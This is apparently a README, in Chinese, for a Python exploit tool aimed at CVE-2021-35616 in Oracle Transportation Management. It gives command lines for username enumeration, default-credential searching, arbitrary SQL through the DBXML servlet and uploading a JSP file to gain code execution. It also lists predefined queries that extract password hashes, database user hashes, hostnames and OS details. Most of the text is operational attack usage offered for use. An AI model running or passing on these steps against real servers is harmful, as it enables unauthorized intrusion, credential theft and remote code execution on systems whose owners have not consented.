用于利用 CVE-2021-35616 的 Python 工具
该脚本按模块工作,我按以下顺序实现:
► 用户名枚举
► 搜索默认凭据
► 使用 DBXML servlet 运行 SQL 查询
► 完全利用与 JSP 执行
脚本语法如下:
.\OracleOTM.py {module} {host TXT file} {additional parameters}
用户名枚举:.\OracleOTM.py enum {hosts TXT file} -u users.txt
搜索默认凭据:.\OracleOTM.py default {hosts TXT file}
使用 DBXML servlet 运行 SQL 查询:.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
我还准备了一些我认为有用的预定义查询;你可以直接使用它们,如下所示:
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – 提取服务器操作系统
Osuser – 提取运行数据库的操作系统用户
Hostname – 数据库服务器主机名
Hostip – 数据库服务器 IP 地址
Passwords – 提取 OTM 用户及其哈希密码
Oraversion – 数据库版本
Dbusershash – 数据库用户密码哈希
Dbfileslocation – 数据库文件在操作系统中的位置
完全利用与 JSP 执行:.\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"